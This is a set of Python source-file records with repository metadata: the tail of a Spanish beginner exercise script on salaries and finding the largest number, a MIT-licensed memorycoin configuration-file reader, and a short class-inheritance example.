    horasTrabajadas = int(input("Ingrese cantidad de horas trabajadas : "))
    salarioBasicoPorHora = float(input("Ingrese salario basico por hora : $"))
    deducciones = float(input("Ingrese deducciones: $"))
    bonificaciones = float(input("Ingrese bonificaciones empleado : $"))
    salarioNeto = (horasTrabajadas * salarioBasicoPorHora) - deducciones + bonificaciones
else:
    nombre = input("Nombre empleado : ")
    horasTrabajadas = int(input("Ingrese cantidad de horas trabajadas : "))
    salarioBasicoPorHora = 6000  # fixed hourly rate for temporary workers
    salarioNeto = horasTrabajadas * salarioBasicoPorHora
print(f"Salario Neto : ${salarioNeto}")
print("---------------------------")
# Exercise 7: read three distinct numbers and print the largest.
print(" 7. Elaborar Un algoritmo que le permita al usuario leer 3 número diferentes entre sí y el computador le imprima el mayor de ellos.")
numero1 = int(input("Ingrese numero 1: "))
# Fixed prompts: the original asked "numero 1" for all three values.
numero2 = int(input("Ingrese numero 2: "))
numero3 = int(input("Ingrese numero 3: "))
numeroMayor = numero1  # default: first number (inputs are assumed distinct)
if numero2 > numero1 and numero2 > numero3:
    numeroMayor = numero2
elif numero3 > numero1 and numero3 > numero2:
    numeroMayor = numero3
print(f"Numero mayor: {numeroMayor}")
print("---------------------------")
"david_ec10@hotmail.com"
] | david_ec10@hotmail.com |
a13567f0e3d8d8902392285c9731804607eddf86 | d8f25577efe8cef687ee4f0cd9a234f1e4b39e14 | /src/memorycoinrpc/config.py | 5435ab138e6b95ffafb0a04085ec5dcbf65aa6b3 | [
"MIT"
] | permissive | baby636/memorycoin-python | cf82f3fdc8699df30f982d8a42d8675af190b623 | 2b938a1be9dc360bba9d825fd3e9492d08fdddd2 | refs/heads/master | 2023-03-16T14:50:31.299150 | 2014-01-15T16:55:23 | 2014-01-15T16:55:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,352 | py | # Copyright (c) 2010 Witchspace <witchspace81@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
Utilities for reading bitcoin configuration files.
"""
import os
def read_config_file(filename):
    """
    Read a simple ``'='``-delimited config file into a dict.

    Blank lines, ``#`` comments and lines without an ``'='`` separator are
    ignored.  Raises :const:`IOError` if the file cannot be opened.
    (The original docstring also claimed :const:`ValueError` on parse
    errors, but malformed lines were — and still are — silently skipped.)
    """
    cfg = {}
    # 'with' closes the handle even if iteration raises (the original used
    # an explicit try/finally around open()/close()).
    with open(filename) as f:
        for line in f:
            line = line.strip()
            if line and not line.startswith("#"):
                # partition() splits on the first '='; sep is empty when the
                # line has no '=', reproducing the old split-and-skip logic.
                key, sep, value = line.partition('=')
                if sep:
                    cfg[key] = value
    return cfg
def read_default_config(filename=None):
    """
    Read the memorycoin configuration from the current user's home directory.

    Arguments:
    - `filename`: Path to a configuration file in a non-standard location (optional)

    Returns None when the file cannot be read or parsed.
    """
    if filename is None:
        filename = os.path.expanduser("~/.memorycoin/memorycoin.conf")
    elif filename.startswith("~"):
        filename = os.path.expanduser(filename)
    try:
        return read_config_file(filename)
    except (IOError, ValueError):
        # Missing or unreadable config is not fatal; fall through to None.
        return None
| [
"mail@emreyilmaz.me"
] | mail@emreyilmaz.me |
09762017c24b5336f4c5d95f277192e6c1447cc1 | 03034837c5f10d19fcc4dc51388f056ec43fd1d2 | /ex8.py | 281eeca7a393efba92404cf62a6beb6b31e97edb | [] | no_license | shaukhk01/project01 | e95c19844757c631f7ffbdd910b20316f49a945b | 79cfe784612fdbb4816c9fc3fc7222c845a3268f | refs/heads/master | 2020-06-26T07:20:49.844532 | 2019-08-20T06:06:40 | 2019-08-20T06:06:40 | 199,569,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 193 | py | class P:
    a = 10  # class attribute, shared by every instance

    def __init__(self):
        # Instance attribute, distinct from the class-level ``a``.
        self.b = 20
class C(P):
    """Child of P: adds class attribute ``c`` and instance attribute ``d``."""

    c = 30

    def __init__(self):
        # Run the parent initializer first so the inherited ``b`` exists.
        P.__init__(self)
        self.d = 40
# Demo: instantiate the child and print inherited (a, b) and own (d) attributes.
obj = C()
print(obj.a,obj.d,obj.b)
| [
"shaukhk01@gmail.com"
] | shaukhk01@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.